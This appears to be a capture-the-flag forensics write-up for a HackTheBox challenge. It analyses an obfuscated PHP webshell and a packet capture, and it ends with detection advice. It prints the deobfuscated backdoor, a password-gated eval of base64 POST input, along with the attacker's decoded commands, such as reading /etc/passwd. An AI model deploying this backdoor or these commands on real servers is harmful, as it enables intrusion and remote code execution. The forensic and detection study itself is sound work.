Obscure is an Easy-rated HackTheBox forensics challenge. You get a packet capture and a PHP webshell uploaded to a compromised Apache server via an arbitrary file upload vulnerability. The task is to analyse the shell and trace attacker activity through the traffic logs.
Analysing the webshell
The uploaded file is support.php. It is heavily obfuscated PHP using three layers: the outer layer is base64 encoded, the middle layer uses variable function calls to reconstruct strings, and the inner layer is the actual eval-based shell. Deobfuscating by replacing each layer with echo statements or running it through a PHP sandbox with eval replaced by print reveals the core:
<?php
if(isset($_POST["login"])) {
if($_POST["login"] === base64_decode("c2VjdXJlUGFzc3dvcmQx")) {
$_SESSION["auth"] = true;
}
}
if($_SESSION["auth"]) {
eval(base64_decode($_POST["cmd"]));
}
?>The login parameter accepts a hardcoded password that decodes to securePassword1. Once authenticated, the cmd parameter is base64 decoded and passed to eval. Functionally a complete remote code execution backdoor in a few lines.
Following the traffic
tshark -r obscure.pcap -Y "http.request.method == POST and http contains support.php" \
-T fields -e frame.number -e http.file_data | head -30Decoding the cmd field from each POST request in sequence reveals the attacker activity:
Request 3: system('id'); # Response: www-data
Request 5: system('cat /etc/passwd');
Request 8: system('find / -name "*.txt" -readable 2>/dev/null');
Request 11: system('cat /var/www/html/flag.txt');Following the TCP stream for request 11 shows the flag in the HTTP response body.
Detection perspective
New PHP files appearing in upload directories, POST requests to paths that should only contain static files, and web server worker processes spawning system shells are the three layers where this attack is detectable. A web server spawning /bin/sh or cmd.exe should trigger an immediate alert in any environment with process creation monitoring.